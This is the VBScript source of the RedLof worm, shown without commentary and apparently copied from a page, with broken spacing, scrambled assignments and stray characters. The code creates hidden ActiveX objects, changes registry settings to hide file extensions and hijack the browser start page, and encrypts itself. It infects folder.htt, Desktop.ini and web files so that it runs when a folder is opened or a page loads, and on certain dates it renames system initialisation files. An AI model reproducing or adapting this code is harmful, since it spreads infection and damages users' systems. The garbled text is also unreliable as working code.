Virus RedLof
Clear TodoIt = WScript.ScriptFullname If Err Then V04 = "html" Else V04 = "vbs" End If If V04 = "vbs" Then Set SCript= CreateObject("Scripting.FileSystemObject") Set WSCript = CreateObject("WScript.Shell") Else Set Applet = Document.applets("who_terrosist") Applet.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") Applet.createInstance() Set WSCript = Applet.GetObject() Applet.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}") Applet.createInstance() Set SCript = Applet.GetObject() End If End Function Function FF16(nPath) If Right(nPath,1) ="\" Then FF16= nPath Else FF16 = nPath & "\" End If End Function Function FF06() FF06 = FF16(Script.GetSpecialFolder(0)) End Function Function FF07() nReg_A = nReg_B = nReg_C = nReg_D = TempPath "HKEY_CURRENT_USER\Control Panel\International\" "HKEY_CURRENT_USER\Software\Classes\CLSID\" "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\" "HKEY_CURRENT_USER\Software\Microsoft\" = "system32\"
With wSCript
If .RegRead(nReg_C & "RegisteredOwner")="Indonesian Today" Then .RegWrite nReg_A & "s1159","Anti AS" .RegWrite nReg_A & "s2359","Anti Shit" .RegWrite nReg_A & "sTimeFormat","HH:mm:ss tt" .RegWrite nReg_B & "{20D04FE0-3AEA-1069-A2D8-08002B30309 D}\","My Komputer" .RegWrite nReg_C & "RegisteredOwner","Indonesian Today" .RegWrite nReg_C & "RegisteredOrganization","We love pea ce" .RegWrite nReg_C & "OrgOrganization","Under Ground Indon esian" .RegWrite nReg_C & "OrgOwner","We love peace!" .RegWrite nReg_D & "Windows\CurrentVersion\Explorer\Adva nced\Hidden",1,"REG_DWORD" .RegWrite nReg_D & "Windows\CurrentVersion\Explorer\Adva nced\HideFileExt",1,"REG_DWORD" .RegWrite nReg_D & "Internet Explorer\Main\Local Page",F F06 & "system\blank.htm" .RegWrite nReg_D & "Internet Explorer\Main\Start Page",F F06 & "system\blank.htm" End If End With End Function Function FF02() On Error Resume Next FF07() VA3 = "" For I = 1 To Len(ScriptText) VA0 = Asc(Mid(ScriptText, I, 1)) If VA0 = 34 Then VA2 = Chr(18) ElseIf VA0 = 10 Then VA2 = Chr(28) ElseIf VA0 = 13 Then VA2 = Chr(29) Else VA2 = Chr(VA0 - 1) End If VA3= VA3 & VA2 Next UnLockStr = "Execute(""Dim ScriptText""&vbCrLf&""For I = 1 To Len(Script Code)""&vbCrLf&""VA0 = Asc(Mid(ScriptCode, I, 1))""&vbCrLf&""If VA0 = 18 Then""& vbCrLf&""VA2 = Chr(34)""&vbCrLf&""ElseIf VA0 = 28 Then""&vbCrLf&""VA2 = Chr(10)" "&vbCrLf&""ElseIf VA0 = 29 Then""&vbCrLf&""VA2 = Chr(13)""&vbCrLf&""Else""&vbCrL f&""VA2 = Chr(VA0 + 1)""&vbCrLf&""End If""&vbCrLf&""ScriptText = ScriptText & VA 2""&vbCrLf&""Next"")" & vbCrLf & "Execute(ScriptText)" ScriptText = "ScriptCode = """ & VA3 & """" nCode ="<!-- Don't modify this line, required by system protocol! -->" & vbcrlf & "<" & "script language=vbscript>" & vbCrLf & "document.write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=who""&""_terrosist HEIGHT=0 WIDTH=0""&""activeX.Active""&""XComponent>" & "<" & "/APPL ET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script lang
uage=vbscript>" & vbCrLf & ScriptText & vbCrLf & UnLockStr & vbCrLf & "<" & "/sc ript>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" ScriptText = "ScriptCode = """ & VA3 & """" VA1 VA1 VA1 VA1 VA1 VA1 VA1 VA1 VA1 VA1 = FF03(Document.location) =Replace(VA1 ,"%20"," ",1,-1) =Replace(VA1 ,"%26","&",1,-1) =Replace(VA1 ,"%25","%",1,-1) =Replace(VA1 ,"%5E","^",1,-1) =Replace(VA1 ,"%5B","[",1,-1) =Replace(VA1 ,"%5D","]",1,-1) =Replace(VA1 ,"%7B","{",1,-1) =Replace(VA1 ,"%7D","}",1,-1) =Replace(VA1 ,"%60","`",1,-1)
If Left(VA1, 4) = "file" Then VA1 = Mid(VA1,9) If instr(1,VA1,".")>0 Then VA1= FF16(Script.GetFolder(Script.GetParentFolderName(Left(VA1,L en(VA1)-1))).ShortPath) Else VA1=FF16(Script.GetFolder(VA1).ShortPath) End If nFolder=FF06 & "web\folder.htt" If SCript.FileExists(nFolder) Then Set V01 = Script.OpenTextFile(nFolder, 1) V02 = V01.ReadAll V02 = Left(V02,Instr!(1,V02,"</BODY>")-1) V01.Close Set FAttrib = SCript.GetFile(nFolder) FAttrib.Attributes = 34 If Instr(1,V02,"run_time()")>0 Then Else Set V03 = Script.OpenTextFile(nFolder, 2) V03.Write "<" & "BODY onload=""" & "vbscript:" & "run_time()""" & ">" & vbCrLf & V02 & vbCrLf & nCode V03.Close FAttrib.Attributes = 34 Script.CopyFile FF06 & "web\folder.htt", FF06 & "system\ m" End If Else Script.CopyFile VA1 & "folder.htt", nFolder FF04 (FF06 & "web\Desktop.ini") Script.CopyFile FF06 & "web\folder.htt", FF06 & "system\ m" End If cFolder=FF06 & "system32\folder.htt" If SCript.FileExists(cFolder) Then Set V01 = Script.OpenTextFile(cFolder, 1) V02 = V01.ReadAll V02 = Left(V02,Instr(1,V02,"</BODY>")-1) V01.Close Set FAttrib = SCript.GetFile(cFolder) FAttrib.Attributes = 34
If Instr(1,V02,"run_time()")>0 Then Else Set V03 = Script.OpenTextFile(cFolder, 2) V03.Write "<" & "BODY onload=""" & "vbscript:" & "run_time()""" & ">" & vbCrLf & V02 & vbCrLf & nCode V03.Close FAttrib.Attributes = 34 Script.CopyFile FF06 & "web\folder.htt", FF06 & "system32\folder .htt" End If Else Script.CopyFile FF06 & "web\folder.htt", cFolder FF04 (FF06 & "system32\Desktop.ini") End If If SCript.FileExists(VA1 & "folder.htt") Then FF05 (VA1 & "folder.htt") Else Script.CopyFile nFolder,VA1 & "folder.htt" End If FF04 (VA1 & "Desktop.ini") Set V01 = Script.OpenTextFile(FF06 & "web\webview.css", 1) V02 = V01.ReadAll V01.Close If instr(1,V02,"left: 30%; width: 70%" )>0 Then V02 =Replace(V02 ,"left: 30%; width: 70%","left: 0%; width: 100% ",1,-1) Set V03 = Script.OpenTextFile(FF06 & "web\webview.css", 2) V03.Write V02 V03.Close End If Set FolderName = Script.GetFolder(VA1) Set ThisFiles = FolderName.Files For Each ThisFile In ThisFiles FileExt = UCase(Script.GetExtensionName(ThisFile.Path)) If FileExt = "HTT" Or FileExt = "HTM" Or FileExt = "HTML" Or Fil eExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then FF05 (ThisFile.Path) End If Next Randomize If Day(Date)=30 and Month(Date) Mod 2 =0 Then Script.MoveFile FF06 & "win.ini", FF06 & "won.chk" Script.MoveFile FF06 & "system.ini", FF06 & "system.chk" End If End Function Function FF05(Filename) If SCript.FileExists(Filename) Then Set V01 = Script.OpenTextFile!(Filename, 1) Set FAttrib = Script.GetFile(Filename) V02 = V01.ReadAll V01.Close
If Instr(1,V02,"</BODY>") > 0 Then V02 = Left(V02,Instr(1,V02,"< /BODY>")-1) If Instr(1,V02,"run_time()")>0 Then Exit Function Else FAttrib.Attributes = 0 Set V03 = Script.OpenTextFile(Filename, 2) V03.Write "<" & "BODY onload=""" & "vbscript:" & "run_ti me()""" & ">" & vbCrLf & V02 & vbCrLf & nCode V03.Close UCase(Script.GetExtensionName(Filename)) If FileExt = "HTT" Then FAttrib.Attributes = 34 Else FAttrib.Attributes = 32 End if End If End If End Function Function FF04(FileName) If SCript.FileExists(Filename) Then Else Set a = Script.CreateTextFile(FileName, True) a.WriteLine("[ExtShellFolderViews]") a.WriteLine("Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}") a.WriteLine("{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28 D4-11CF-AE66-08002B2E1262}"& vbcrlf) a.WriteLine("[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]") a.WriteLine("PersistMoniker=file://folder.htt" & vbcrlf) a.WriteLine("[.ShellClassInfo]") a.WriteLine("ConfirmFileOp=0") a.Close Set FAttrib = Script.GetFile(Filename) FAttrib.Attributes = 34 End If End Function Function FF03(VA1) If Right(VA1,1) ="/" Then FF03=VA1 Else FF03=VA1 & "/" End If End Function